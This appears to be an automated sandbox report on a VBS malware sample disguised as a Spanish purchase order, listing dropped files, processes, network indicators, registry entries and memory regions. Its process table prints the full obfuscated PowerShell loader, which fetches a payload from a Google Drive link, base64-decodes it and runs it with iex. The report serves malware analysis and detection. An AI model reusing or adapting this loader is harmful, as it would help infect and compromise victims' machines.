Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs | ASCII text, with CRLF line terminators | initial sample | |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | dropped | |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ik42faz4.rce.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ov434nxa.hxo.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Roaming\Benzinforhandlers.xan | HTML document, ASCII text, with very long lines (1692), with no line terminators | dropped | |

Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting
Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If
($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets
-lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function
Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz
GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness
d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie
InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1
Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11
'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla:
Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc
uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel
ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C
ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous
(Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ
urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+
S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E
kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj
vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo
lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous
(Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe
bjAS cioNKartoAFortrGVaagneDekstrOsteo] Sulf:Pound:Psychs GangE FaseCKulleuGruo.rdesmoiNrlsttaand,YF.reaP Suger UnenOUdkldTRu
udoKompoc.rigsOgaruaLPleon s.mal=Chas Syste[Ful sNAf evEOvereTSubv..ShellSByrneeFiniccS,aftuTviv R tehuI HalvtIncavYK rosPMumblrGlot
oDom,stf agmo,lloicBesvao Cry lSkdp,t eoxyUnmotpCleanEBambu]bus.e: Cong:Race,TOutflL S.atSSimpl1Eksot2Slvsn ');$Fordrvende=$Flyversjusser[0];$Filmatiserer=(Osmate11
'Raddl$QuillgOutsklPartioBolivbTenniaD vell konv:SubcrBForb oTaxeoN .lamA Tian=,tilnNTacitEPolarW ermi-KimmsONoe ebDodekjStatuERegarCpussytAdolp
sko S ,manY TeatS bravT gramEOr.homEncep.RasteNKundeETeodot Bron. ipstWFhaarEOversbLetvgcMuldvlOvervI.rrinE coitN WivaTUdenl
');Semicalcareous ($Filmatiserer);Semicalcareous (Osmate11 ',loac$ Un oB uieto ercynenep aFeder. OocyHP.angeFralgaTak ld TaxieFoxharKildesNonre[
Retr$Po itLRackeiMtaalncoaptgCoenuv kateivokatsbaggrtPhooleUng irBolignPaatveDuplisSpgel]Syste=Knig.$ ProdfVallirSoutteUltramWhe
ss SvejtBascui palel unpllComedi Forsn OvergBums sWindoeIsdanvAbbaynNaadle implnMosef ');$Flugtbilister=Osmate11 'sk le$ForurBDow
sobra anevapoa Groe..nsinD.plysoDy,grwDe.obnBringl Hippo UphoaP oardsvanhF MonoiProctlbubalePa,dr(Ko if$Djve FChondoBillarForlgd
Sty rknevlvRalleeUnhu nCoagudChriseHom.g, Khev$PreprC jorinon tsFemineDobbelLbeseuReengr Disse osmo1Mourn4Taels4Metat) Ef.e
';$Ciselure144=$Frstehaandsviden93;Semicalcareous (Osmate11 'Parfe$BilleGAkadeLUg deoNowhibSkod,AXmasbLAlkin:NonosFFe lbjple
roBeedggEring3 Li h3Ruptu=Spand(QuadrTB.kegESfaersUnv ntFljls-mogssp HanhAPh.siTMarkeh bund Vask$ UdtrCMagtbiMonkfS nsaleSupe,lBac.sudo.jeROxyheeStudi1Gt
el4 salg4Frok )Unpli ');while (!$Fjog33) {Semicalcareous (Osmate11 'Ndtvu$Dear.gOverelAcridocoo.obSmalfa A,myl Diss:Pu hfFFremmoRigorrRum,aeOm
laiMatchgPneumn T tae PrverBillesSammehSyntaiP zazpAnl,s= skyg$ Clovt UdverCh rauSootpeDigox ') ;Semicalcareous $Flugtbilister;Semicalcareous
(Osmate11 'BushgS StorTBijekaKoru,rUdsmutUnret- TrykSVarefLSumloE inteESnipePBrnds Celie4Faldg ');Semicalcareous (Osmate11
'Indga$QuadrgDampsLAdelaOJu.ulb Divea S,iblUnfl,:UlvanfCosigjC reboKapelgS,lgs3Conge3Indva=Aphid(S oppTDaaseECal.mSMethotGenne-
Forcp FiscaMarmeTConfuH Betr U gra$Flo lcBloksiU,perS Ar eePladdLArecaUuk.lirS ottE F st1Mabes4Perg.4Stenv)M.ane ') ;Semicalcareous
(Osmate11 ' Spek$ verrGBoderLCupstoSkjo,BSam ea lorcL Disk:AfsniNFlde ARegi,TU enli ColoOpun.tNMe acaEven LBjlkeSUnp aO.ngakC
,okliDobbeaWhin LSk alISubjeS Banit UnabE QuerRhustrnUt ttereaffSDoc e1Boiss8Intim5Diaph=Bravu$FigurG KremLBagueOFiremBcalmaADeposL
H pn:SejrraOve,dnHugenNa herU MotoLGa,pllPodicAhypertIconveCharm+Ba,df+ Atte%Boe t$La abfUnwe.lCar.oy BigavUmbereBiblir KvarsInterj
MhorUXylots rakSFootge,ahinRSnirk.noedvcPenlooGeninuCapriN obbotF dig ') ;$Fordrvende=$Flyversjusser[$Nationalsocialisternes185];}$Cruellest=298454;$Gerri=31481;Semicalcareous
(Osmate11 'Gagen$HyrekgAngi LT lefOunnotbFr dsAunpasLDiano:Dity P Vaera onogRVoldtAsipidLE.okiLTeleoEE srelBarraiB,jdsz FlydI
Usvkntrig,gOverl P osp=Ins i atchg PipieSpo.vTOveri-LigniCW hluoKnotlNUnc utFadebELigulN UndiTTekni Jarvy$slapdCUnoveiEnligsKanoneFingelEvangUMonopRArc,eEKola
1T avs4pro.r4kefti ');Semicalcareous (Osmate11 'Haren$ResidgStaggl ,humoRedifb StitaStbollSporo:Uld,aM rredeEmetosFla,so Ub,sc
ForfeSysilpDistihLeukoaSp inlNem.ri .ewrsKla smForla Highb=Uny,l Nonpe[AnkomSLiq eyRegios EstetForaneAquatmmikro.stukkCun,nvo
metrnOptllvCubaseMa,kerFortit Pala] orta:S egr:BatfiFV ljerBedstoSkorzmstyr.B KuanaVe kos U iveenean6Hulki4UrimeSPagintcinchrIndhoiAg
flnSesamgPty l(E top$ Abo.PAlebeaSnebrrIsoniaAmbullNar olEn eleInradlGaaseiByronzUnvoli LibonNew pgOutri) ksp ');Semicalcareous
(Osmate11 'Tonef$TribugFuldslG neroInterB RavnAParliLRette:El ctsLovbrk LukkaIndusAUnpron Eft SNusseeSkoleLIns.rs optrLTurb,S
palaePsiloRinforeSeaf Allo =Nonc, Numme[BespasOutthyChippsGearvtTi sye Sta mAntip.Eddist BetjEAfstixTintotSharr. Outne bolinHilahcD,magO
ealiDHurinIMarg.NSparkgBndel]mercu: Ch o:SayabAJuvenSRumfrcTysklIG ltyITendi.FairegFusleESamdrtS nkrsRygeatUlykkrFlyveI Anc
N AlthGSwing(Sel.r$ha inMBethleOvermS O phoMikroc PassE VernPRecocH SeraaInnatl Ter,IPlatySultr mSting) Bl,t ');Semicalcareous
(Osmate11 'Adeno$VandbgEhre LAffotoGidsebLykkeaP esslBagag:NulleaR.empn BaneTfogedESuperGCelluN pponi Dri NAchaeg.iploe LyncR.erraNPresteUnpo
=Purdu$ rawls C leK rammADissea.evolNIndhySDetacEO.istlRekruSSnoreLloddesSempleHandsRS,jdmE Eyne.CanthsVvni u Famib I prsDagblTFolioR
yllaISttedn Fol G rgot(stu i$ExtraCCheerRP omiU Li aeU,memLU.vejl OrthE TimeS ensiTTeg,e, Yuck$ForkoG eserESkattrGa.anR NundIMoe,t)Butto
');Semicalcareous $Antegningerne;"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs

| Name | IP | Malicious |
|---|---|---|
| http://pesterbdd.com/images/Pester.png | unknown | |
| http://www.apache.org/licenses/LICENSE-2.0.html | unknown | |
| https://go.micro | unknown | |
| https://github.com/Pester/Pester | unknown | |
| https://www.google.com | unknown | |
| http://nuget.org/NuGet.exe | unknown | |
| http://drive.usercontent.google.com | unknown | |
| https://drive.googPzm | unknown | |
| https://drive.usercontent.googhko | unknown | |
| https://contoso.com/ | unknown | |
| https://drive.usercontent.google.comD=620 | unknown | |
| https://nuget.org/nuget.exe | unknown | |
| https://contoso.com/License | unknown | |
| https://contoso.com/Icon | unknown | |
| https://drive.google.com | unknown | |
| https://drive.usercontent.google.com | unknown | |
| https://drive.googPb | unknown | |
| http://drive.google.com | unknown | |
| https://aka.ms/pscore68 | unknown | |
| https://apis.google.com | unknown | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown | |

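There are 11 more URLs that this listing does not show. Every URL above has IP "unknown", and several are truncated or fused strings (for example `https://go.micro` and `https://drive.googPzm`), so the list looks like strings recovered from memory or script text rather than confirmed requests; entries such as the Pester, NuGet and contoso.com URLs are consistent with text shipped in stock PowerShell modules. Only drive.google.com and drive.usercontent.google.com appear with resolved addresses in the Domains and IPs tables.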
Domains

| Name | IP | Malicious |
|---|---|---|
| drive.google.com | 142.250.185.206 | |
| drive.usercontent.google.com | 142.250.185.65 | |

IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 142.250.185.206 | drive.google.com | United States | |
| 142.250.185.65 | drive.usercontent.google.com | United States | |

Registry

| Path | Value | Malicious |
|---|---|---|
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileDirectory | |

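There are 4 more registry entries that this listing does not show. The `Tracing\powershell_RASAPI32` and `Tracing\powershell_RASMANCS` values listed above are normally written by Windows itself when a process first loads the RAS networking libraries; here they corroborate that powershell.exe used the network and should not be read as persistence or configuration tampering by the sample.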
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1400DC05000
|
heap
|
page read and write
|
||
1400DC0E000
|
heap
|
page read and write
|
||
1400BC85000
|
heap
|
page read and write
|
||
1400BC4D000
|
heap
|
page read and write
|
||
1400E241000
|
heap
|
page read and write
|
||
200F5FE000
|
stack
|
page read and write
|
||
7FFB4AC70000
|
trusted library allocation
|
page read and write
|
||
1E9B2206000
|
heap
|
page read and write
|
||
1E9B24AF000
|
heap
|
page read and write
|
||
1E998310000
|
heap
|
page read and write
|
||
1400BCB3000
|
heap
|
page read and write
|
||
1400BBEB000
|
heap
|
page read and write
|
||
1400BCD0000
|
heap
|
page read and write
|
||
1400E240000
|
heap
|
page read and write
|
||
1400BC6A000
|
heap
|
page read and write
|
||
1E99BBD6000
|
trusted library allocation
|
page read and write
|
||
1400DC0D000
|
heap
|
page read and write
|
||
1E998314000
|
heap
|
page read and write
|
||
1E99BAAA000
|
trusted library allocation
|
page read and write
|
||
1400BC48000
|
heap
|
page read and write
|
||
7FFB4ACA0000
|
trusted library allocation
|
page read and write
|
||
1400DC03000
|
heap
|
page read and write
|
||
1E9982AA000
|
heap
|
page read and write
|
||
1E99A1DD000
|
trusted library allocation
|
page read and write
|
||
1E99A1C8000
|
trusted library allocation
|
page read and write
|
||
7FFB4AA80000
|
trusted library allocation
|
page read and write
|
||
1400DC07000
|
heap
|
page read and write
|
||
1E9B2498000
|
heap
|
page read and write
|
||
1E998397000
|
heap
|
page read and write
|
||
1E999F57000
|
trusted library allocation
|
page read and write
|
||
7FFB4AB56000
|
trusted library allocation
|
page execute and read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1E998290000
|
trusted library allocation
|
page read and write
|
||
1400BC45000
|
heap
|
page read and write
|
||
1400DC00000
|
heap
|
page read and write
|
||
7FFB4ACD0000
|
trusted library allocation
|
page read and write
|
||
1E999DB1000
|
trusted library allocation
|
page read and write
|
||
1400DD0B000
|
heap
|
page read and write
|
||
1400DC0D000
|
heap
|
page read and write
|
||
4C5CE7E000
|
stack
|
page read and write
|
||
1400BDD0000
|
heap
|
page read and write
|
||
1400BC2E000
|
heap
|
page read and write
|
||
7FFB4AC40000
|
trusted library allocation
|
page execute and read and write
|
||
1E9B2376000
|
heap
|
page execute and read and write
|
||
4C5CD78000
|
stack
|
page read and write
|
||
1400BC85000
|
heap
|
page read and write
|
||
4C5CA7E000
|
stack
|
page read and write
|
||
1400BC67000
|
heap
|
page read and write
|
||
1E9B222B000
|
heap
|
page read and write
|
||
1E9982C0000
|
heap
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1E9B2280000
|
heap
|
page execute and read and write
|
||
1400DC4C000
|
heap
|
page read and write
|
||
7FFB4AA7D000
|
trusted library allocation
|
page execute and read and write
|
||
4C5CC77000
|
stack
|
page read and write
|
||
1E99B378000
|
trusted library allocation
|
page read and write
|
||
1400DC32000
|
heap
|
page read and write
|
||
1400DC02000
|
heap
|
page read and write
|
||
4C5CB7E000
|
stack
|
page read and write
|
||
200FCFB000
|
stack
|
page read and write
|
||
1400BC44000
|
heap
|
page read and write
|
||
1400DC02000
|
heap
|
page read and write
|
||
1400BC66000
|
heap
|
page read and write
|
||
4C5CDFE000
|
stack
|
page read and write
|
||
7FFB4ADD0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD00000
|
trusted library allocation
|
page read and write
|
||
1E9983A1000
|
heap
|
page read and write
|
||
1400DE11000
|
heap
|
page read and write
|
||
7FFB4AC60000
|
trusted library allocation
|
page execute and read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
7FFB4ACE0000
|
trusted library allocation
|
page read and write
|
||
7FFB4ADA0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AC52000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1400DC01000
|
heap
|
page read and write
|
||
1400BC7F000
|
heap
|
page read and write
|
||
200F8FE000
|
stack
|
page read and write
|
||
7FFB4ADC0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AB26000
|
trusted library allocation
|
page read and write
|
||
1E998308000
|
heap
|
page read and write
|
||
1E998393000
|
heap
|
page read and write
|
||
4C5CCF9000
|
stack
|
page read and write
|
||
4C5DACD000
|
stack
|
page read and write
|
||
1400BC16000
|
heap
|
page read and write
|
||
1E99BAAF000
|
trusted library allocation
|
page read and write
|
||
1400BE50000
|
heap
|
page read and write
|
||
1E9982B0000
|
heap
|
page read and write
|
||
7FFB4AB20000
|
trusted library allocation
|
page read and write
|
||
1400DC1C000
|
heap
|
page read and write
|
||
1E9B220E000
|
heap
|
page read and write
|
||
1400DC09000
|
heap
|
page read and write
|
||
1400BC34000
|
heap
|
page read and write
|
||
1E99A35A000
|
trusted library allocation
|
page read and write
|
||
1400BBEA000
|
heap
|
page read and write
|
||
1E998230000
|
heap
|
page read and write
|
||
1400DC17000
|
heap
|
page read and write
|
||
7FFB4AB2C000
|
trusted library allocation
|
page execute and read and write
|
||
1400DC0D000
|
heap
|
page read and write
|
||
7FFB4AC80000
|
trusted library allocation
|
page read and write
|
||
7FFB4AA73000
|
trusted library allocation
|
page execute and read and write
|
||
1400DC2A000
|
heap
|
page read and write
|
||
1E9AA027000
|
trusted library allocation
|
page read and write
|
||
1400BC25000
|
heap
|
page read and write
|
||
1E9B2511000
|
heap
|
page read and write
|
||
7FFB4AC90000
|
trusted library allocation
|
page read and write
|
||
1E9B24E1000
|
heap
|
page read and write
|
||
7FFB4AD80000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD90000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1E99A29B000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
7FFB4AC10000
|
trusted library allocation
|
page read and write
|
||
1400BC31000
|
heap
|
page read and write
|
||
1400BF60000
|
heap
|
page read and write
|
||
1E998270000
|
trusted library allocation
|
page read and write
|
||
1E99A2D8000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
7DF3FF140000
|
trusted library allocation
|
page execute and read and write
|
||
1E998399000
|
heap
|
page read and write
|
||
1400DC04000
|
heap
|
page read and write
|
||
4C5DA4C000
|
stack
|
page read and write
|
||
1E99BEDA000
|
trusted library allocation
|
page read and write
|
||
1E99BF44000
|
trusted library allocation
|
page read and write
|
||
4C5CAFE000
|
stack
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1E9B2198000
|
heap
|
page read and write
|
||
1E9B2370000
|
heap
|
page execute and read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1400BC59000
|
heap
|
page read and write
|
||
1400BC27000
|
heap
|
page read and write
|
||
7FFB4AD50000
|
trusted library allocation
|
page read and write
|
||
4C5C533000
|
stack
|
page read and write
|
||
1400BC6A000
|
heap
|
page read and write
|
||
1400BC29000
|
heap
|
page read and write
|
||
1400BBC0000
|
heap
|
page read and write
|
||
1400BC34000
|
heap
|
page read and write
|
||
7FFB4ACB0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AB90000
|
trusted library allocation
|
page execute and read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1E9B218C000
|
heap
|
page read and write
|
||
1E998550000
|
heap
|
page readonly
|
||
1E9B2480000
|
heap
|
page read and write
|
||
7FFB4AD60000
|
trusted library allocation
|
page read and write
|
||
1400DC84000
|
heap
|
page read and write
|
||
1E998305000
|
heap
|
page read and write
|
||
1400DC41000
|
heap
|
page read and write
|
||
7FFB4AC21000
|
trusted library allocation
|
page read and write
|
||
1E99BAC4000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1400BC62000
|
heap
|
page read and write
|
||
1400BC25000
|
heap
|
page read and write
|
||
4C5CF7E000
|
stack
|
page read and write
|
||
7FFB4AD40000
|
trusted library allocation
|
page read and write
|
||
200F3FE000
|
stack
|
page read and write
|
||
1400BC85000
|
heap
|
page read and write
|
||
1400DC07000
|
heap
|
page read and write
|
||
200F2FE000
|
stack
|
page read and write
|
||
200F9FE000
|
stack
|
page read and write
|
||
1E999D31000
|
trusted library allocation
|
page read and write
|
||
4C5D9CE000
|
stack
|
page read and write
|
||
4C5CBF7000
|
stack
|
page read and write
|
||
1400BC85000
|
heap
|
page read and write
|
||
7FFB4AD30000
|
trusted library allocation
|
page read and write
|
||
1E99A1C4000
|
trusted library allocation
|
page read and write
|
||
1E998560000
|
trusted library allocation
|
page read and write
|
||
1E99BAE8000
|
trusted library allocation
|
page read and write
|
||
1400DC3E000
|
heap
|
page read and write
|
||
1E99A65F000
|
trusted library allocation
|
page read and write
|
||
7FFB4AA90000
|
trusted library allocation
|
page read and write
|
||
1E99BAD0000
|
trusted library allocation
|
page read and write
|
||
1E9B2330000
|
heap
|
page read and write
|
||
1400BC2A000
|
heap
|
page read and write
|
||
1E99834E000
|
heap
|
page read and write
|
||
1400BC8F000
|
heap
|
page read and write
|
||
1400BC40000
|
heap
|
page read and write
|
||
1E9B24B3000
|
heap
|
page read and write
|
||
1400DC0D000
|
heap
|
page read and write
|
||
1E99A2DC000
|
trusted library allocation
|
page read and write
|
||
1400DC0A000
|
heap
|
page read and write
|
||
7FFB4ADB0000
|
trusted library allocation
|
page read and write
|
||
1400BC16000
|
heap
|
page read and write
|
||
1400DFCA000
|
heap
|
page read and write
|
||
4C5C87E000
|
stack
|
page read and write
|
||
1E9B2380000
|
heap
|
page read and write
|
||
1E99B05F000
|
trusted library allocation
|
page read and write
|
||
1400DC22000
|
heap
|
page read and write
|
||
1400BDB0000
|
heap
|
page read and write
|
||
7FFB4ACF0000
|
trusted library allocation
|
page read and write
|
||
1E9B253B000
|
heap
|
page read and write
|
||
7FFB4AA74000
|
trusted library allocation
|
page read and write
|
||
1400BC2E000
|
heap
|
page read and write
|
||
1400BC8C000
|
heap
|
page read and write
|
||
1E99A5F6000
|
trusted library allocation
|
page read and write
|
||
4C5CEFE000
|
stack
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
200EF8A000
|
stack
|
page read and write
|
||
1E99BACC000
|
trusted library allocation
|
page read and write
|
||
1400DC25000
|
heap
|
page read and write
|
||
1400DAF2000
|
heap
|
page read and write
|
||
1E9B1D34000
|
heap
|
page read and write
|
||
1E9980F0000
|
heap
|
page read and write
|
||
1400BBF0000
|
heap
|
page read and write
|
||
1E9A9D9E000
|
trusted library allocation
|
page read and write
|
||
1E9981D0000
|
heap
|
page read and write
|
||
1E9982CE000
|
heap
|
page read and write
|
||
1E999BC0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD70000
|
trusted library allocation
|
page read and write
|
||
7FFB4AA8B000
|
trusted library allocation
|
page read and write
|
||
1E99A1CC000
|
trusted library allocation
|
page read and write
|
||
1E99BF1C000
|
trusted library allocation
|
page read and write
|
||
7FFB4AC30000
|
trusted library allocation
|
page execute and read and write
|
||
1E99BAC1000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1400BC7F000
|
heap
|
page read and write
|
||
1400DC35000
|
heap
|
page read and write
|
||
1400BBF0000
|
heap
|
page read and write
|
||
7FFB4ADF0000
|
trusted library allocation
|
page read and write
|
||
1400BC5B000
|
heap
|
page read and write
|
||
200F7FE000
|
stack
|
page read and write
|
||
7FFB4AD10000
|
trusted library allocation
|
page read and write
|
||
1E998326000
|
heap
|
page read and write
|
||
1E9981F0000
|
heap
|
page read and write
|
||
1E99A1B9000
|
trusted library allocation
|
page read and write
|
||
4C5CFFB000
|
stack
|
page read and write
|
||
1400BC7F000
|
heap
|
page read and write
|
||
1E99B9FD000
|
trusted library allocation
|
page read and write
|
||
4C5C5FE000
|
stack
|
page read and write
|
||
1E9A9EE1000
|
trusted library allocation
|
page read and write
|
||
4C5C8FE000
|
stack
|
page read and write
|
||
1E99BF17000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1400BC48000
|
heap
|
page read and write
|
||
1400BC5B000
|
heap
|
page read and write
|
||
1400DC12000
|
heap
|
page read and write
|
||
7FFB4ACC0000
|
trusted library allocation
|
page read and write
|
||
1400DC46000
|
heap
|
page read and write
|
||
4C5C97E000
|
stack
|
page read and write
|
||
1E99A379000
|
trusted library allocation
|
page read and write
|
||
1E9B23A3000
|
heap
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1E9985A0000
|
heap
|
page read and write
|
||
1400DC35000
|
heap
|
page read and write
|
||
1400BC34000
|
heap
|
page read and write
|
||
1400BBE9000
|
heap
|
page read and write
|
||
1400BC4A000
|
heap
|
page read and write
|
||
1400BBC9000
|
heap
|
page read and write
|
||
1E999D20000
|
heap
|
page execute and read and write
|
||
1400DC2E000
|
heap
|
page read and write
|
||
1400BC2E000
|
heap
|
page read and write
|
||
1400BC7F000
|
heap
|
page read and write
|
||
7FFB4ADE0000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1400DD07000
|
heap
|
page read and write
|
||
1E9B21D8000
|
heap
|
page read and write
|
||
7FFB4AC2A000
|
trusted library allocation
|
page read and write
|
||
1400DE25000
|
heap
|
page read and write
|
||
1400DC06000
|
heap
|
page read and write
|
||
7FFB4AACC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AA72000
|
trusted library allocation
|
page read and write
|
||
1400BC5C000
|
heap
|
page read and write
|
||
1E9A9D31000
|
trusted library allocation
|
page read and write
|
||
1E9B2180000
|
heap
|
page read and write
|
||
1400BBEC000
|
heap
|
page read and write
|
||
7FFB4AD20000
|
trusted library allocation
|
page read and write
|
||
1E99A1AF000
|
trusted library allocation
|
page read and write
|
||
1400BC85000
|
heap
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1400BC6A000
|
heap
|
page read and write
|
||
1E9AA019000
|
trusted library allocation
|
page read and write
|
||
1E9982B5000
|
heap
|
page read and write
|
||
1400BC62000
|
heap
|
page read and write
|
||
4C5C9FC000
|
stack
|
page read and write
|
||
1400DC3A000
|
heap
|
page read and write
|
||
1400BCA9000
|
heap
|
page read and write
|
||
1E9982A0000
|
heap
|
page read and write
|
||
7FFB4AA70000
|
trusted library allocation
|
page read and write
|
||
200F6FE000
|
stack
|
page read and write
|
||
1E9985A5000
|
heap
|
page read and write
|
||
1E9B24B7000
|
heap
|
page read and write
|
||
200FBFE000
|
stack
|
page read and write
|
||
1E99BAD4000
|
trusted library allocation
|
page read and write
|
||
1E9B24BF000
|
heap
|
page read and write
|
||
1400BC7F000
|
heap
|
page read and write
|
||
1400BC50000
|
heap
|
page read and write
|
||
1E999BF0000
|
trusted library allocation
|
page read and write
|
||
1400DC0F000
|
heap
|
page read and write
|
||
1E9B21D6000
|
heap
|
page read and write
|
||
1E9A9D41000
|
trusted library allocation
|
page read and write
|
||
4C5C5BE000
|
stack
|
page read and write
|
||
1400BF65000
|
heap
|
page read and write
|
||
